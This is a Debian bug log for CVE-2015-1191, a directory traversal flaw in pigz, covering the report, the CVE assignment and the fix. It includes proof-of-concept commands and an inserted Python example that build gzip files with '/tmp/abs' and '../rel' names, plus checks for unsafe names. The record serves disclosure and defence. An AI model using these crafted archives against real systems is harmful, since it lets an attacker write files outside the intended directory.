pigz: CVE-2015-1191: directory traversal vulnerability


Debian Bug report logs - #774978


Package: pigz; Maintainer for pigz is Eduard Bloch <blade@debian.org>; Source for pigz is src:pigz (PTS, buildd, popcon).

Reported by: Alexander Cherepanov <cherepan@mccme.ru>

Date: Fri, 9 Jan 2015 16:42:02 UTC

Severity: normal

Tags: security

Found in version pigz/2.3.1-1

Fixed in version pigz/2.3.1-2

Done: Eduard Bloch <blade@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Eduard Bloch <blade@debian.org>:
Bug#774978; Package pigz. (Fri, 09 Jan 2015 16:42:07 GMT)


Acknowledgement sent to Alexander Cherepanov <cherepan@mccme.ru>:
New Bug report received and forwarded. Copy sent to Eduard Bloch <blade@debian.org>. (Fri, 09 Jan 2015 16:42:07 GMT)


Message #5 received at submit@bugs.debian.org:

From: Alexander Cherepanov <cherepan@mccme.ru>
To: submit@bugs.debian.org
Subject: pigz: directory traversal vulnerability
Date: Fri, 09 Jan 2015 19:39:04 +0300
Package: pigz
Version: 2.3.1-1
Tags: security

pigz is susceptible to directory traversal vulnerabilities. While 
decompressing a file and restoring the original file name, it (unlike 
gzip) will happily use absolute and relative paths taken from the 
input. This can be exploited by a malicious archive to write files 
outside the current directory.

1. Absolute path.

A sample could be prepared in the following way:

$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs

Then check that it works:

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ unpigz -N abs.gz

$ ls /tmp/abs
/tmp/abs

2. Relative path with "..".

A sample could be prepared in the following way:

$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel

Then check that it works:

$ ls ../rel
ls: cannot access ../rel: No such file or directory

$ unpigz -N rel.gz

$ ls ../rel
../rel

-- 
Alexander Cherepanov
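
The report builds its samples by running gzip and then patching the stored name with sed, which only works because the replacement ("/tmp/abs" for "XtmpXabs", "../rel" for "XXXrel") has exactly the same length as the placeholder: the name lives in the gzip header as a NUL-terminated FNAME field, so a length change would corrupt the member. The following is an added example, not part of the report or of pigz, that builds the same payloads directly from the RFC 1952 layout without that constraint, extracts the stored name the way a decompressor has to, flags names that escape the current directory, and applies the base-name policy (the behaviour the reporter contrasts with gzip) that a fixed decompressor should use for -N. The function names, the fallback name and the hello-world payload are this example's own choices.

```python
import gzip
import posixpath
import struct
import zlib
from typing import Optional

# RFC 1952 FLG bits.
FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16


def make_gzip_with_name(data: bytes, stored_name: str) -> bytes:
    """Build a one-member gzip stream whose FNAME field is stored_name.

    Equivalent to the report's gzip|sed trick, but any name length works:
    10-byte header, NUL-terminated name, raw deflate body, CRC32+ISIZE trailer.
    """
    name = stored_name.encode("latin-1")  # RFC 1952: FNAME is ISO 8859-1
    # ID1, ID2, CM=8 (deflate), FLG=FNAME, MTIME=0, XFL=0, OS=3 (Unix)
    header = struct.pack("<4BIBB", 0x1F, 0x8B, 8, FNAME, 0, 0, 3)
    deflater = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw deflate
    body = deflater.compress(data) + deflater.flush()
    trailer = struct.pack("<II", zlib.crc32(data) & 0xFFFFFFFF, len(data) & 0xFFFFFFFF)
    return header + name + b"\0" + body + trailer


def stored_name(blob: bytes) -> Optional[str]:
    """Return the FNAME field of the first gzip member, or None if absent.

    This is the untrusted value a decompressor sees when -N is used.
    """
    if len(blob) < 10 or blob[:2] != b"\x1f\x8b" or blob[2] != 8:
        raise ValueError("not a gzip stream")
    flg = blob[3]
    pos = 10
    if flg & FEXTRA:  # FEXTRA comes before FNAME in the header
        xlen = struct.unpack_from("<H", blob, pos)[0]
        pos += 2 + xlen
    if not flg & FNAME:
        return None
    end = blob.index(b"\0", pos)
    return blob[pos:end].decode("latin-1")


def name_is_unsafe(stored: str) -> bool:
    """True if writing `stored` as given could land outside the current directory."""
    normalized = stored.replace("\\", "/")  # treat backslash as a separator too
    return normalized.startswith("/") or ".." in normalized.split("/")


def safe_restore_name(stored: str, fallback: str) -> str:
    """Base-name policy: drop every directory component of a header-supplied name.

    An empty, "." or ".." result is useless as a file name, so fall back to the
    name the decompressor would have derived from the input file (assumed here
    to be passed in by the caller).
    """
    base = posixpath.basename(stored.replace("\\", "/"))
    if base in ("", ".", ".."):
        return fallback
    return base


if __name__ == "__main__":
    # The report's two payloads plus a benign name; "hello" is a constructed body.
    for payload_name in ("/tmp/abs", "../rel", "plain.txt"):
        blob = make_gzip_with_name(b"hello\n", payload_name)
        name = stored_name(blob)
        assert gzip.decompress(blob) == b"hello\n"  # the member itself is valid
        print(f"{name!r:12} unsafe={name_is_unsafe(name)} "
              f"restore_as={safe_restore_name(name, 'out')!r}")
```

Writing the bytes returned by make_gzip_with_name("/tmp/abs") to a file and running unpigz -N on it in a scratch directory reproduces the report against an unfixed build; the restore_as column is what the decompressor should have written instead. The name check and the base-name policy are separate on purpose: the first is what a scanner or a decompressor that prefers to refuse the member needs, the second is what a decompressor that still wants to honour -N needs.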



Information forwarded to debian-bugs-dist@lists.debian.org, Eduard Bloch <blade@debian.org>:
Bug#774978; Package pigz. (Sun, 18 Jan 2015 20:33:04 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Eduard Bloch <blade@debian.org>. (Sun, 18 Jan 2015 20:33:04 GMT)


Message #10 received at 774978@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Alexander Cherepanov <cherepan@mccme.ru>, 774978@bugs.debian.org
Subject: Re: Bug#774978: pigz: directory traversal vulnerability
Date: Sun, 18 Jan 2015 21:30:06 +0100
Control: retitle -1 pigz: CVE-2015-1191: directory traversal vulnerability

Hi,

CVE-2015-1191 was assigned for this issue in pigz.

Regards,
Salvatore



Changed Bug title to 'pigz: CVE-2015-1191: directory traversal vulnerability' from 'pigz: directory traversal vulnerability'. Request was from Salvatore Bonaccorso <carnil@debian.org> to 774978-submit@bugs.debian.org. (Sun, 18 Jan 2015 20:33:04 GMT)


Reply sent to Eduard Bloch <blade@debian.org>:
You have taken responsibility. (Sun, 18 Jan 2015 23:21:08 GMT)


Notification sent to Alexander Cherepanov <cherepan@mccme.ru>:
Bug acknowledged by developer. (Sun, 18 Jan 2015 23:21:08 GMT)


Message #17 received at 774978-close@bugs.debian.org:

From: Eduard Bloch <blade@debian.org>
To: 774978-close@bugs.debian.org
Subject: Bug#774978: fixed in pigz 2.3.1-2
Date: Sun, 18 Jan 2015 23:18:42 +0000
Source: pigz
Source-Version: 2.3.1-2

We believe that the bug you reported is fixed in the latest version of
pigz, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 774978@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Eduard Bloch <blade@debian.org> (supplier of updated pigz package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sun, 18 Jan 2015 23:58:51 +0100
Source: pigz
Binary: pigz
Architecture: source
Version: 2.3.1-2
Distribution: unstable
Urgency: high
Maintainer: Eduard Bloch <blade@debian.org>
Changed-By: Eduard Bloch <blade@debian.org>
Description:
 pigz       - Parallel Implementation of GZip
Closes: 774978
Changes:
 pigz (2.3.1-2) unstable; urgency=high
 .
   * Patch(es) from upstream's SCM to solve handling of target file names with
     the -N option (CVE-2015-1191, closes: #774978)
Checksums-Sha1:
 5d8b2cde2befd3f50eb2f2b57095c10aa417fb13 1647 pigz_2.3.1-2.dsc
 49577b466c87ccfd931e3ab3480406085156ecf0 5180 pigz_2.3.1-2.debian.tar.xz
Checksums-Sha256:
 88888e0848d513a55e8ec22d03cf6747f271010019c03dad71160a35a2ee7d5f 1647 pigz_2.3.1-2.dsc
 edcbc59e062416e2307bef52b88a914261b99b2497ffc1ac9cd606f310c9b02a 5180 pigz_2.3.1-2.debian.tar.xz
Files:
 8eb78b4d666b26e8801a44104694218e 1647 utils extra pigz_2.3.1-2.dsc
 ef4c4fab3d625f5b2ee7933bd5557e36 5180 utils extra pigz_2.3.1-2.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBVLw75Gl0DlyzX+w8AQhJYBAAp6mzf0Inigb0rFGKQ+83WwOcvdaS9rT7
gshIL2q8A2RYmOaHqF7Vq7O5reR9AvRJfE0Ukc5PEoOKmj0wn9rwETG2QOmdIIcW
FtNwX0wtDRqO5gqii/bRFSHN573LNMUEmr8ApcEQo0RkYUyrgoN2EzdUGihM0zSn
U7i5ErpiO/kRO2UKLq94cmcY4t0rRo9ITKCPnsbJ93/IRBHDh4n9oxMq886s4YxQ
gADUKfjPpOQWAKCYozFowm1M/D7K2+uW6Jtsd2cE4/uvBQanriS2vScfF1Vkc9Cz
StBgRPwZg/TAXo9lMq53L/HhtFpn0lnUnIm6eF89Ve5lMMnajdc7f7csEpNxwqTr
n1k5dgjYl8cHecroULDPoJ+z0RQ+0LXEHKEi+jOtEnUwbvk+o1IrFq9HvjGiveKf
onZqSmcgvOCtAvQg7QImcdj8BxEDhBk+VtCsJdH4oWh5pVQtLYgZBILccCXIqg/U
gLPdhGEArmDolURlKA1/YNgYGAWVUU5gHQEVe2Tar0Em/oiE/1l+SXmQFFHPMkwQ
8xfEXCxWE70hg69NhnyBCy98cNNDBIk/sA4pmRbJzEIjBTmZS1GmyaZVyBPl0dQ4
mxGjG9AC9Jkn9n2KjMhXVQbG1p9JiFuTvrFs6BuadRpVtZrE1OKH4m++z5KHorYI
oChrHC4bFjI=
=IEco
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 23 Feb 2015 07:30:15 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 18:15:00 2019; Machine Name: buxtehude
